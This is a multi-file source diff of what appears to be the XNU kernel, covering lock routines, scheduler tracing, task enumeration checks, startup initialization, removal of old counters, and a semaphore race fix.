@@ -672,23 +672,13 @@ void
        hw_lock_lock_internal(lock, thread LCK_GRP_ARG(grp));
 }
 
-/*
- *     Routine: hw_lock_to
- *
- *     Acquire lock, spinning until it becomes available or timeout.
- *     Timeout is in mach_absolute_time ticks, return with
- *     preemption disabled.
- */
-unsigned
-int
-(hw_lock_to)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp))
+static inline unsigned int
+hw_lock_to_internal(hw_lock_t lock, uint64_t timeout, thread_t thread
+    LCK_GRP_ARG(lck_grp_t *grp))
 {
-       thread_t        thread;
-       uintptr_t       state;
+       uintptr_t state;
        unsigned int success = 0;
 
-       thread = current_thread();
-       disable_preemption_for_thread(thread);
        state = LCK_MTX_THREAD_TO_STATE(thread) | PLATFORM_LCK_ILOCK;
 #if     LOCK_PRETEST
        if (ordered_load_hw(lock)) {
@@ -710,6 +700,40 @@ end:
        return success;
 }
 
+/*
+ *     Routine: hw_lock_to
+ *
+ *     Acquire lock, spinning until it becomes available or timeout.
+ *     Timeout is in mach_absolute_time ticks, return with
+ *     preemption disabled.
+ */
+unsigned
+int
+(hw_lock_to)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp))
+{
+       thread_t thread = current_thread();
+       disable_preemption_for_thread(thread);
+       return hw_lock_to_internal(lock, timeout, thread LCK_GRP_ARG(grp));
+}
+
+/*
+ *     Routine: hw_lock_to_nopreempt
+ *
+ *     Acquire lock, spinning until it becomes available or timeout.
+ *     Timeout is in mach_absolute_time ticks, called and return with
+ *     preemption disabled.
+ */
+unsigned
+int
+(hw_lock_to_nopreempt)(hw_lock_t lock, uint64_t timeout LCK_GRP_ARG(lck_grp_t *grp))
+{
+       thread_t thread = current_thread();
+       if (__improbable(!preemption_disabled_for_thread(thread))) {
+               panic("Attempt to test no-preempt spinlock %p in preemptible context", lock);
+       }
+       return hw_lock_to_internal(lock, timeout, thread LCK_GRP_ARG(grp));
+}
+
 /*
  *     Routine: hw_lock_try
  *
index 24879020598a512c4240c290a7bf64a3c0f215da..03f9287d46552894b38a063619bc45c143423a81 100644 (file)
@@ -75,7 +75,6 @@
 #include <mach/processor_server.h>
 
 #include <kern/kern_types.h>
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <kern/cpu_quiesce.h>
 #include <kern/ipc_host.h>
@@ -175,8 +174,6 @@ host_reboot(
                return KERN_INVALID_HOST;
        }
 
-       assert(host_priv == &realhost);
-
 #if DEVELOPMENT || DEBUG
        if (options & HOST_REBOOT_DEBUGGER) {
                Debugger("Debugger");
@@ -466,8 +463,6 @@ host_get_boot_info(
                return KERN_INVALID_HOST;
        }
 
-       assert(host_priv == &realhost);
-
        /*
         * Copy first operator string terminated by '\0' followed by
         *      standardized strings generated from boot string.
index fc1b4b6f456e555adba15aeef44064b8245b54d2..f0a7f35352009b64fae2228f02ceece7415f8c1f 100644 (file)
@@ -158,6 +158,9 @@ extern void proc_inherit_task_role(task_t new_task, task_t old_task);
 
 #if CONFIG_IOSCHED
 #define IOSCHED_METADATA_TIER                   THROTTLE_LEVEL_TIER1
+#define IOSCHED_METADATA_EXPEDITED_TIER         THROTTLE_LEVEL_TIER0
+_Static_assert(IOSCHED_METADATA_EXPEDITED_TIER < IOSCHED_METADATA_TIER,
+    "expedited metadata tier must be less than metadata tier");
 #endif /* CONFIG_IOSCHED */
 
 extern int proc_get_darwinbgstate(task_t task, uint32_t *flagsp);
index 898086d8ec3518c91e525bcb24f601d1f0228443..8acbbc8d45e54116f73e517324e82913e85c3ca0 100644 (file)
@@ -365,7 +365,7 @@ __doprnt(
 
                if (c == 'z' || c == 'Z') {
                        c = *++fmt;
-                       if (sizeof(size_t) == sizeof(unsigned long)) {
+                       if (sizeof(size_t) == sizeof(unsigned long long)) {
                                long_long = 1;
                        }
                }
index 3cffb3fed39dbbebb4e37fbfb9b66cbeebf92abd..01aa936af947d9949f962dcc5ff36ee82d48f742 100644 (file)
@@ -108,7 +108,9 @@ queue_head_t            corpse_tasks;
 int                     tasks_count;
 int                     terminated_tasks_count;
 queue_head_t            threads;
+queue_head_t            terminated_threads;
 int                     threads_count;
+int                     terminated_threads_count;
 LCK_GRP_DECLARE(task_lck_grp, "task");
 LCK_ATTR_DECLARE(task_lck_attr, 0, 0);
 LCK_MTX_DECLARE_ATTR(tasks_threads_lock, &task_lck_grp, &task_lck_attr);
@@ -179,6 +181,7 @@ processor_bootstrap(void)
        queue_init(&tasks);
        queue_init(&terminated_tasks);
        queue_init(&threads);
+       queue_init(&terminated_threads);
        queue_init(&corpse_tasks);
 
        processor_init(master_processor, master_cpu, &pset0);
@@ -1212,7 +1215,8 @@ processor_set_things(
        processor_set_t pset,
        void **thing_list,
        mach_msg_type_number_t *count,
-       int type)
+       int type,
+       mach_task_flavor_t flavor)
 {
        unsigned int i;
        task_t task;
@@ -1344,7 +1348,7 @@ processor_set_things(
 
        /* for each task, make sure we are allowed to examine it */
        for (i = used = 0; i < actual_tasks; i++) {
-               if (mac_task_check_expose_task(task_list[i])) {
+               if (mac_task_check_expose_task(task_list[i], flavor)) {
                        task_deallocate(task_list[i]);
                        continue;
                }
@@ -1455,12 +1459,12 @@ processor_set_tasks_internal(
        processor_set_t         pset,
        task_array_t            *task_list,
        mach_msg_type_number_t  *count,
-       int                     flavor)
+       mach_task_flavor_t      flavor)
 {
        kern_return_t ret;
        mach_msg_type_number_t i;
 
-       ret = processor_set_things(pset, (void **)task_list, count, PSET_THING_TASK);
+       ret = processor_set_things(pset, (void **)task_list, count, PSET_THING_TASK, flavor);
        if (ret != KERN_SUCCESS) {
                return ret;
        }
@@ -1469,7 +1473,12 @@ processor_set_tasks_internal(
        switch (flavor) {
        case TASK_FLAVOR_CONTROL:
                for (i = 0; i < *count; i++) {
-                       (*task_list)[i] = (task_t)convert_task_to_port((*task_list)[i]);
+                       if ((*task_list)[i] == current_task()) {
+                               /* if current_task(), return pinned port */
+                               (*task_list)[i] = (task_t)convert_task_to_port_pinned((*task_list)[i]);
+                       } else {
+                               (*task_list)[i] = (task_t)convert_task_to_port((*task_list)[i]);
+                       }
                }
                break;
        case TASK_FLAVOR_READ:
@@ -1559,7 +1568,7 @@ processor_set_threads(
        kern_return_t ret;
        mach_msg_type_number_t i;
 
-       ret = processor_set_things(pset, (void **)thread_list, count, PSET_THING_THREAD);
+       ret = processor_set_things(pset, (void **)thread_list, count, PSET_THING_THREAD, TASK_FLAVOR_CONTROL);
        if (ret != KERN_SUCCESS) {
                return ret;
        }
index eb2246cbd5993dbc2a44b785b421cff4b1714a6c..16927ab1719fb7efe063c1c16ecae8f3bf3c2894 100644 (file)
@@ -291,7 +291,7 @@ struct pset_node {
 extern struct pset_node pset_node0;
 
 extern queue_head_t tasks, threads, corpse_tasks;
-extern int tasks_count, terminated_tasks_count, threads_count;
+extern int tasks_count, terminated_tasks_count, threads_count, terminated_threads_count;
 decl_lck_mtx_data(extern, tasks_threads_lock);
 decl_lck_mtx_data(extern, tasks_corpse_lock);
 
@@ -300,6 +300,8 @@ decl_lck_mtx_data(extern, tasks_corpse_lock);
  */
 extern queue_head_t terminated_tasks;
 
+extern queue_head_t terminated_threads;
+
 struct processor {
        processor_state_t       state;                  /* See above */
        bool                    is_SMT;
index 2f06bca905e915574544237691b78163c521a4ed..a757f709f2273e47b61e1979fb15c1f58810f20d 100644 (file)
@@ -670,40 +670,6 @@ sched_amp_thread_group_recommendation_change(struct thread_group *tg, cluster_ty
 }
 
 #if DEVELOPMENT || DEBUG
-extern int32_t sysctl_get_bound_cpuid(void);
-int32_t
-sysctl_get_bound_cpuid(void)
-{
-       int32_t cpuid = -1;
-       thread_t self = current_thread();
-
-       processor_t processor = self->bound_processor;
-       if (processor == NULL) {
-               cpuid = -1;
-       } else {
-               cpuid = processor->cpu_id;
-       }
-
-       return cpuid;
-}
-
-extern void sysctl_thread_bind_cpuid(int32_t cpuid);
-void
-sysctl_thread_bind_cpuid(int32_t cpuid)
-{
-       if (cpuid < 0 || cpuid >= MAX_SCHED_CPUS) {
-               return;
-       }
-
-       processor_t processor = processor_array[cpuid];
-       if (processor == PROCESSOR_NULL) {
-               return;
-       }
-
-       thread_bind(processor);
-
-       thread_block(THREAD_CONTINUE_NULL);
-}
 
 extern char sysctl_get_bound_cluster_type(void);
 char
@@ -765,6 +731,6 @@ sysctl_task_set_cluster_type(char cluster_type)
 
        thread_block(THREAD_CONTINUE_NULL);
 }
-#endif
+#endif /* DEVELOPMENT || DEBUG */
 
-#endif
+#endif /* __AMP__ */
index f74e8b960d421fda3058a1e96b5ba0ee4a72df77..f2bd777ffeadb51590abc91526b1e2c2715934c5 100644 (file)
@@ -71,6 +71,7 @@
 #if CONFIG_TELEMETRY
 #include <kern/telemetry.h>
 #endif
+#include <kern/zalloc_internal.h>
 
 #include <sys/kdebug.h>
 
@@ -112,6 +113,7 @@ static struct sched_average {
        { compute_stack_target, NULL, 5, 1 },
        { compute_pageout_gc_throttle, NULL, 1, 0 },
        { compute_pmap_gc_throttle, NULL, 60, 0 },
+       { compute_zone_working_set_size, NULL, ZONE_WSS_UPDATE_PERIOD, 0 },
 #if CONFIG_TELEMETRY
        { compute_telemetry, NULL, 1, 0 },
 #endif
index 64075494751c352060d4c19e36244eeceb944ae3..adcec01c668b9745fda1a2aa307cd514c9ca6003 100644 (file)
@@ -83,7 +83,6 @@
 #include <kern/kern_types.h>
 #include <kern/backtrace.h>
 #include <kern/clock.h>
-#include <kern/counters.h>
 #include <kern/cpu_number.h>
 #include <kern/cpu_data.h>
 #include <kern/smp.h>
@@ -687,6 +686,8 @@ thread_unblock(
 
                ctime = mach_absolute_time();
                thread->realtime.deadline = thread->realtime.constraint + ctime;
+               KDBG(MACHDBG_CODE(DBG_MACH_SCHED, MACH_SET_RT_DEADLINE) | DBG_FUNC_NONE,
+                   (uintptr_t)thread_tid(thread), thread->realtime.deadline, thread->realtime.computation, 0);
        }
 
        /*
@@ -2098,6 +2099,10 @@ restart:
                        }
                }
 
+               bool secondary_forced_idle = ((processor->processor_secondary != PROCESSOR_NULL) &&
+                   (thread_no_smt(thread) || (thread->sched_pri >= BASEPRI_RTQUEUES)) &&
+                   (processor->processor_secondary->state == PROCESSOR_IDLE));
+
                /* OK, so we're not going to run the current thread. Look at the RT queue. */
                bool ok_to_run_realtime_thread = sched_ok_to_run_realtime_thread(pset, processor);
                if ((rt_runq_count(pset) > 0) && ok_to_run_realtime_thread) {
@@ -2174,6 +2179,10 @@ pick_new_rt_thread:
                                        ipi_type = sched_ipi_action(sprocessor, NULL, false, SCHED_IPI_EVENT_SMT_REBAL);
                                        ast_processor = sprocessor;
                                }
+                       } else if (secondary_forced_idle && !thread_no_smt(new_thread) && pset_has_stealable_threads(pset)) {
+                               pset_update_processor_state(pset, sprocessor, PROCESSOR_DISPATCHING);
+                               ipi_type = sched_ipi_action(sprocessor, NULL, true, SCHED_IPI_EVENT_PREEMPT);
+                               ast_processor = sprocessor;
                        }
                        pset_unlock(pset);
 
@@ -2428,8 +2437,6 @@ thread_invoke(
 
                        thread->continuation = thread->parameter = NULL;
 
-                       counter(c_thread_invoke_hits++);
-
                        boolean_t enable_interrupts = TRUE;
 
                        /* idle thread needs to stay interrupts-disabled */
@@ -2444,7 +2451,6 @@ thread_invoke(
                } else if (thread == self) {
                        /* same thread but with continuation */
                        ast_context(self);
-                       counter(++c_thread_invoke_same);
 
                        thread_unlock(self);
 
@@ -2484,14 +2490,12 @@ thread_invoke(
                if (!thread->kernel_stack) {
 need_stack:
                        if (!stack_alloc_try(thread)) {
-                               counter(c_thread_invoke_misses++);
                                thread_unlock(thread);
                                thread_stack_enqueue(thread);
                                return FALSE;
                        }
                } else if (thread == self) {
                        ast_context(self);
-                       counter(++c_thread_invoke_same);
                        thread_unlock(self);
 
                        KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
@@ -2521,8 +2525,6 @@ need_stack:
 
        thread_unlock(thread);
 
-       counter(c_thread_invoke_csw++);
-
        self->reason = reason;
 
        processor->last_dispatch = ctime;
@@ -2845,6 +2847,8 @@ thread_dispatch(
                                 *      consumed the entire quantum.
                                 */
                                if (thread->quantum_remaining == 0) {
+                                       KDBG(MACHDBG_CODE(DBG_MACH_SCHED, MACH_CANCEL_RT_DEADLINE) | DBG_FUNC_NONE,
+                                           (uintptr_t)thread_tid(thread), thread->realtime.deadline, thread->realtime.computation, 0);
                                        thread->realtime.deadline = UINT64_MAX;
                                }
                        } else {
@@ -3103,8 +3107,6 @@ thread_dispatch(
  *     thread resumes, it will execute the continuation function
  *     on a new kernel stack.
  */
-counter(mach_counter_t  c_thread_block_calls = 0; )
-
 wait_result_t
 thread_block_reason(
        thread_continue_t       continuation,
@@ -3116,8 +3118,6 @@ thread_block_reason(
        thread_t        new_thread;
        spl_t           s;
 
-       counter(++c_thread_block_calls);
-
        s = splsched();
 
        processor = current_processor();
@@ -6921,3 +6921,61 @@ thread_bind_cluster_type(thread_t thread, char cluster_type, bool soft_bound)
        (void)soft_bound;
 #endif /* __AMP__ */
 }
+
+#if DEVELOPMENT || DEBUG
+extern int32_t sysctl_get_bound_cpuid(void);
+int32_t
+sysctl_get_bound_cpuid(void)
+{
+       int32_t cpuid = -1;
+       thread_t self = current_thread();
+
+       processor_t processor = self->bound_processor;
+       if (processor == NULL) {
+               cpuid = -1;
+       } else {
+               cpuid = processor->cpu_id;
+       }
+
+       return cpuid;
+}
+
+extern kern_return_t sysctl_thread_bind_cpuid(int32_t cpuid);
+kern_return_t
+sysctl_thread_bind_cpuid(int32_t cpuid)
+{
+       processor_t processor = PROCESSOR_NULL;
+
+       if (cpuid == -1) {
+               goto unbind;
+       }
+
+       if (cpuid < 0 || cpuid >= MAX_SCHED_CPUS) {
+               return KERN_INVALID_VALUE;
+       }
+
+       processor = processor_array[cpuid];
+       if (processor == PROCESSOR_NULL) {
+               return KERN_INVALID_VALUE;
+       }
+
+#if __AMP__
+
+       thread_t thread = current_thread();
+
+       if (thread->sched_flags & (TH_SFLAG_ECORE_ONLY | TH_SFLAG_PCORE_ONLY)) {
+               if ((thread->sched_flags & TH_SFLAG_BOUND_SOFT) == 0) {
+                       /* Cannot hard-bind an already hard-cluster-bound thread */
+                       return KERN_NOT_SUPPORTED;
+               }
+       }
+
+#endif /* __AMP__ */
+
+unbind:
+       thread_bind(processor);
+
+       thread_block(THREAD_CONTINUE_NULL);
+       return KERN_SUCCESS;
+}
+#endif /* DEVELOPMENT || DEBUG */
index 67eb289710c36affc25428e2280db82acc44af88..7d08bea4b71f522ea91bc836866c4b4c7d3175e6 100644 (file)
 #include <kern/lock_group.h>
 #include <machine/simple_lock.h>
 
-#ifdef MACH_KERNEL_PRIVATE
+#ifdef XNU_KERNEL_PRIVATE
+
+#if MACH_KERNEL_PRIVATE
 #include <machine/atomic.h>
 #include <mach_ldebug.h>
+#endif
+
+__BEGIN_DECLS
+
+#pragma GCC visibility push(hidden)
 
+#ifdef MACH_KERNEL_PRIVATE
 extern void                     hw_lock_init(
        hw_lock_t);
 
@@ -97,6 +105,11 @@ extern unsigned int             hw_lock_to(
        uint64_t,
        lck_grp_t*);
 
+extern unsigned int             hw_lock_to_nopreempt(
+       hw_lock_t,
+       uint64_t,
+       lck_grp_t*);
+
 extern unsigned int             hw_lock_try(
        hw_lock_t,
        lck_grp_t*);
@@ -109,27 +122,36 @@ extern unsigned int             hw_lock_try_nopreempt(
 
 extern void                     hw_lock_lock(
        hw_lock_t);
-
-#define hw_lock_lock(lck, grp) hw_lock_lock(lck)
+#define hw_lock_lock(lck, grp) \
+       hw_lock_lock(lck)
 
 extern void                     hw_lock_lock_nopreempt(
        hw_lock_t);
-#define hw_lock_lock_nopreempt(lck, grp) hw_lock_lock_nopreempt(lck)
+#define hw_lock_lock_nopreempt(lck, grp) \
+       hw_lock_lock_nopreempt(lck)
 
 extern unsigned int             hw_lock_to(
        hw_lock_t,
        uint64_t);
-#define hw_lock_to(lck, timeout, grp) hw_lock_to(lck, timeout)
+#define hw_lock_to(lck, timeout, grp) \
+       hw_lock_to(lck, timeout)
+
+extern unsigned int             hw_lock_to_nopreempt(
+       hw_lock_t,
+       uint64_t);
+#define hw_lock_to_nopreempt(lck, timeout, grp) \
+       hw_lock_to_nopreempt(lck, timeout)
 
 
 extern unsigned int             hw_lock_try(
        hw_lock_t);
-#define hw_lock_try(lck, grp) hw_lock_try(lck)
+#define hw_lock_try(lck, grp) \
+       hw_lock_try(lck)
 
 extern unsigned int             hw_lock_try_nopreempt(
        hw_lock_t);
-#define hw_lock_try_nopreempt(lck, grp) hw_lock_try_nopreempt(lck)
-
+#define hw_lock_try_nopreempt(lck, grp) \
+       hw_lock_try_nopreempt(lck)
 
 #endif /* LOCK_STATS */
 
@@ -149,8 +171,10 @@ extern boolean_t                hw_atomic_test_and_set32(
        enum memory_order ord,
        boolean_t wait);
 
+extern void                     usimple_unlock_nopreempt(
+       usimple_lock_t);
+
 #endif /* MACH_KERNEL_PRIVATE */
-#if XNU_KERNEL_PRIVATE
 
 struct usimple_lock_startup_spec {
        usimple_lock_t  lck;
@@ -167,10 +191,6 @@ extern void                     usimple_lock_startup_init(
        STARTUP_ARG(LOCKS_EARLY, STARTUP_RANK_FOURTH, usimple_lock_startup_init, \
            &__startup_usimple_lock_spec_ ## var)
 
-#endif /* XNU_KERNEL_PRIVATE */
-
-__BEGIN_DECLS
-
 extern void *                   hw_wait_while_equals(
        void    **address,
        void    *current);
@@ -203,32 +223,35 @@ extern unsigned int     usimple_lock_try_lock_mp_signal_safe_loop_duration(
        uint64_t,
        lck_grp_t*);
 #endif
-
 #else
 extern void                     usimple_lock(
        usimple_lock_t);
-#define usimple_lock(lck, grp) usimple_lock(lck)
+#define usimple_lock(lck, grp) \
+       usimple_lock(lck)
 
 
 extern unsigned int             usimple_lock_try(
        usimple_lock_t);
-
-#define usimple_lock_try(lck, grp) usimple_lock_try(lck)
+#define usimple_lock_try(lck, grp) \
+       usimple_lock_try(lck)
 
 extern void             usimple_lock_try_lock_loop(
        usimple_lock_t);
-#define usimple_lock_try_lock_loop(lck, grp) usimple_lock_try_lock_loop(lck)
+#define usimple_lock_try_lock_loop(lck, grp) \
+       usimple_lock_try_lock_loop(lck)
 
 #if defined(__x86_64__)
 extern unsigned int     usimple_lock_try_lock_mp_signal_safe_loop_deadline(
        usimple_lock_t,
        uint64_t);
-#define usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl, grp) usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl)
+#define usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl, grp) \
+       usimple_lock_try_lock_mp_signal_safe_loop_deadline(lck, ddl)
 
 extern unsigned int     usimple_lock_try_lock_mp_signal_safe_loop_duration(
        usimple_lock_t,
        uint64_t);
-#define usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur, grp) usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur)
+#define usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur, grp) \
+       usimple_lock_try_lock_mp_signal_safe_loop_duration(lck, dur)
 #endif
 
 #endif /* LOCK_STATS */
@@ -237,24 +260,21 @@ extern void                     usimple_unlock(
        usimple_lock_t);
 
 
-__END_DECLS
-
-#define ETAP_NO_TRACE   0
-#define ETAP_IO_AHA             0
-
 /*
  * If we got to here and we still don't have simple_lock_init
  * defined, then we must either be outside the osfmk component,
  * running on a true SMP, or need debug.
  */
 #if !defined(simple_lock_init)
-#define simple_lock_init(l, t)   usimple_lock_init(l,t)
-#define simple_lock(l, grp)          usimple_lock(l, grp)
-#define simple_unlock(l)        usimple_unlock(l)
-#define simple_lock_try(l, grp)      usimple_lock_try(l, grp)
+#define simple_lock_init(l, t)               usimple_lock_init(l,t)
+#define simple_lock(l, grp)                  usimple_lock(l, grp)
+#define simple_unlock(l)                     usimple_unlock(l)
+#define simple_lock_try(l, grp)              usimple_lock_try(l, grp)
 #define simple_lock_try_lock_loop(l, grp)    usimple_lock_try_lock_loop(l, grp)
-#define simple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp)    usimple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp)
-#define simple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp)    usimple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp)
+#define simple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp) \
+       usimple_lock_try_lock_mp_signal_safe_loop_deadline(l, ddl, grp)
+#define simple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp) \
+       usimple_lock_try_lock_mp_signal_safe_loop_duration(l, dur, grp)
 #define simple_lock_addr(l)     (&(l))
 #endif /* !defined(simple_lock_init) */
 
@@ -288,23 +308,27 @@ extern unsigned int hw_lock_bit_to(
 extern void     hw_lock_bit(
        hw_lock_bit_t *,
        unsigned int);
-#define hw_lock_bit(lck, bit, grp) hw_lock_bit(lck, bit)
+#define hw_lock_bit(lck, bit, grp) \
+       hw_lock_bit(lck, bit)
 
 extern void     hw_lock_bit_nopreempt(
        hw_lock_bit_t *,
        unsigned int);
-#define hw_lock_bit_nopreempt(lck, bit, grp) hw_lock_bit_nopreempt(lck, bit)
+#define hw_lock_bit_nopreempt(lck, bit, grp) \
+       hw_lock_bit_nopreempt(lck, bit)
 
 extern unsigned int hw_lock_bit_try(
        hw_lock_bit_t *,
        unsigned int);
-#define hw_lock_bit_try(lck, bit, grp) hw_lock_bit_try(lck, bit)
+#define hw_lock_bit_try(lck, bit, grp) \
+       hw_lock_bit_try(lck, bit)
 
 extern unsigned int hw_lock_bit_to(
        hw_lock_bit_t *,
        unsigned int,
        uint32_t);
-#define hw_lock_bit_to(lck, bit, timeout, grp) hw_lock_bit_to(lck, bit, timeout)
+#define hw_lock_bit_to(lck, bit, timeout, grp) \
+       hw_lock_bit_to(lck, bit, timeout)
 
 #endif /* LOCK_STATS */
 
@@ -316,10 +340,16 @@ extern void     hw_unlock_bit_nopreempt(
        hw_lock_bit_t *,
        unsigned int);
 
-#define hw_lock_bit_held(l, b) (((*(l))&(1<<b))!=0)
+#define hw_lock_bit_held(l, b) \
+       (((*(l)) & (1 << (b))) != 0)
 
 #endif  /* MACH_KERNEL_PRIVATE */
 
+__END_DECLS
+
+#pragma GCC visibility pop
+
+#endif /* XNU_KERNEL_PRIVATE */
 #endif /*!_KERN_SIMPLE_LOCK_H_*/
 
 #endif  /* KERNEL_PRIVATE */
index 5f19428395bf96f3c4402f98def07bf4784b4d8d..12cbd907b6b1959f2ed6bd7656cb168cd836b645 100644 (file)
@@ -197,7 +197,6 @@ void scale_setup(void);
 extern void bsd_scale_setup(int);
 extern unsigned int semaphore_max;
 extern void stackshot_init(void);
-extern void ktrace_init(void);
 
 /*
  *     Running in virtual memory, on the interrupt stack.
@@ -324,6 +323,7 @@ kernel_startup_log(startup_subsystem_id_t subsystem)
                [STARTUP_SUB_CODESIGNING] = "codesigning",
                [STARTUP_SUB_OSLOG] = "oslog",
                [STARTUP_SUB_MACH_IPC] = "mach_ipc",
+               [STARTUP_SUB_SYSCTL] = "sysctl",
                [STARTUP_SUB_EARLY_BOOT] = "early_boot",
 
                /* LOCKDOWN is special and its value won't fit here. */
@@ -642,13 +642,6 @@ kernel_bootstrap_thread(void)
        bootprofile_init();
 #endif
 
-#if (defined(__i386__) || defined(__x86_64__)) && CONFIG_VMX
-       vmx_init();
-#endif
-
-       kernel_bootstrap_thread_log("ktrace_init");
-       ktrace_init();
-
        char trace_typefilter[256] = {};
        PE_parse_boot_arg_str("trace_typefilter", trace_typefilter,
            sizeof(trace_typefilter));
@@ -658,10 +651,7 @@ kernel_bootstrap_thread(void)
        kdebug_init(new_nkdbufs, trace_typefilter,
            (trace_wrap ? KDOPT_WRAPPING : 0) | KDOPT_ATBOOT);
 
-#ifdef  MACH_BSD
-       kernel_bootstrap_log("bsd_early_init");
-       bsd_early_init();
-#endif
+       kernel_startup_initialize_upto(STARTUP_SUB_SYSCTL);
 
 #ifdef  IOKIT
        kernel_bootstrap_log("PE_init_iokit");
index 6c5e01b333e9d8b9d1b0ba6394bc997ea49b523d..83f26c45ef4794b64d557b8103b7bdf778374e45 100644 (file)
@@ -153,8 +153,8 @@ __enum_decl(startup_rank_t, uint32_t, {
 #elif defined(__x86_64__)
 /* Intel doesn't have a __BOOTDATA but doesn't protect __KLD */
 #define STARTUP_CODE_SEGSECT "__TEXT,__text"
-#define STARTUP_DATA_SEGSECT "__KLD,__init"
-#define STARTUP_HOOK_SEGMENT "__KLD"
+#define STARTUP_DATA_SEGSECT "__KLDDATA,__init"
+#define STARTUP_HOOK_SEGMENT "__KLDDATA"
 #define STARTUP_HOOK_SECTION "__init_entry_set"
 #else
 /* arm protects __KLD early, so use __BOOTDATA for data */
@@ -175,7 +175,7 @@ __enum_decl(startup_rank_t, uint32_t, {
  */
 #define __startup_func \
        __PLACE_IN_SECTION(STARTUP_CODE_SEGSECT) \
-       __attribute__((noinline, visibility("hidden")))
+       __attribute__((cold, visibility("hidden")))
 
 /*!
  * @macro __startup_data
@@ -260,20 +260,28 @@ __enum_decl(startup_rank_t, uint32_t, {
        static __startup_data struct startup_tunable_spec \
        __startup_TUNABLES_spec_ ## var = { \
            .name = __startup_TUNABLES_name_ ## var, \
-           .var_addr = &var, \
+           .var_addr = (void *)&var, \
            .var_len = sizeof(type_t), \
            .var_is_bool = __builtin_types_compatible_p(bool, type_t), \
        }; \
        __STARTUP_ARG(var, __LINE__, TUNABLES, STARTUP_RANK_FIRST, \
            kernel_startup_tunable_init, &__startup_TUNABLES_spec_ ## var)
 
+#ifdef __cplusplus
+#define __STARTUP_FUNC_CAST(func, a) \
+           (void(*)(const void *))func
+#else
+#define __STARTUP_FUNC_CAST(func, a) \
+           (typeof(func(a))(*)(const void *))func
+#endif
+
 
 #define __STARTUP1(name, line, subsystem, rank, func, a, b) \
        __PLACE_IN_SECTION(STARTUP_HOOK_SEGMENT "," STARTUP_HOOK_SECTION) \
        static const struct startup_entry \
        __startup_ ## subsystem ## _entry_ ## name ## _ ## line = { \
            STARTUP_SUB_ ## subsystem, \
-           rank, (typeof(func(a))(*)(const void *))func, b, \
+           rank, __STARTUP_FUNC_CAST(func, a), b, \
        }
 
 #define __STARTUP(name, line, subsystem, rank, func) \
@@ -325,7 +333,6 @@ extern void device_service_create(void);
 
 /* BSD subsystem initialization */
 extern void bsd_init(void);
-extern void bsd_early_init(void);
 
 #endif  /* MACH_BSD */
 
index c2a963d04d196d2f525897fbc7fcee99aa1513eb..40825399ec05823d8d398a5ba95eebfb6f28d192 100644 (file)
@@ -113,7 +113,7 @@ suid_cred_destroy(ipc_port_t port)
 
        ip_lock(port);
        assert(ip_kotype(port) == IKOT_SUID_CRED);
-       sc = (suid_cred_t)port->ip_kobject;
+       sc = (suid_cred_t)ipc_kobject_get(port);
        ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE);
        ip_unlock(port);
 
@@ -143,7 +143,7 @@ convert_suid_cred_to_port(suid_cred_t sc)
        }
 
        if (!ipc_kobject_make_send_lazy_alloc_port(&sc->port,
-           (ipc_kobject_t) sc, IKOT_SUID_CRED, false, 0)) {
+           (ipc_kobject_t) sc, IKOT_SUID_CRED, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                suid_cred_free(sc);
                return IP_NULL;
        }
@@ -177,7 +177,7 @@ suid_cred_verify(ipc_port_t port, struct vnode *vnode, uint32_t *uid)
                return -1;
        }
 
-       sc = (suid_cred_t)port->ip_kobject;
+       sc = (suid_cred_t)ipc_kobject_get(port);
 
        if (vnode != sc->vnode) {
                ip_unlock(port);
index 31ea5caaedf96c1f00ddd6dedb110fb2cbcab0f3..dfa8d1153ae4a89e0e4910f0df7ff31b387deb03 100644 (file)
@@ -180,6 +180,12 @@ semaphore_create(
         *  the new semaphore to the task's semaphore list.
         */
        task_lock(task);
+       /* Check for race with task_terminate */
+       if (!task->active) {
+               task_unlock(task);
+               zfree(semaphore_zone, s);
+               return KERN_INVALID_TASK;
+       }
        enqueue_head(&task->semaphore_list, (queue_entry_t) s);
        task->semaphores_owned++;
        task_unlock(task);
index 4d65fe2ae3c3bdb4ca5a0ba2b7089041ec3d3495..60af738a82aa2c1a2b1940f7f7c174c8f507e810 100644 (file)
@@ -58,7 +58,7 @@
 #include <mach/thread_switch.h>
 #include <ipc/ipc_port.h>
 #include <ipc/ipc_space.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/ipc_kobject.h>
 #include <kern/processor.h>
 #include <kern/sched.h>
@@ -131,8 +131,6 @@ swtch(
        }
        enable_preemption();
 
-       counter(c_swtch_block++);
-
        thread_yield_with_continuation((thread_continue_t)swtch_continue, NULL);
 }
 
@@ -170,8 +168,6 @@ swtch_pri(
        }
        enable_preemption();
 
-       counter(c_swtch_pri_block++);
-
        thread_depress_abstime(thread_depress_time);
 
        thread_yield_with_continuation((thread_continue_t)swtch_pri_continue, NULL);
index f6a6c7ad740deac63c1aec838b4e8fb3d5a3e1ee..9a2484022e4259e1840634deaa942036f6acda6d 100644 (file)
@@ -115,7 +115,7 @@ const mach_trap_t       mach_trap_table[MACH_TRAP_TABLE_COUNT] = {
 /* 10 */ MACH_TRAP(_kernelrpc_mach_vm_allocate_trap, 4, 5, munge_wwlw),
 /* 11 */ MACH_TRAP(_kernelrpc_mach_vm_purgable_control_trap, 4, 5, munge_wlww),
 /* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),
-/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),
+/* 13 */ MACH_TRAP(task_dyld_process_info_notify_get_trap, 2, 4, munge_ll),
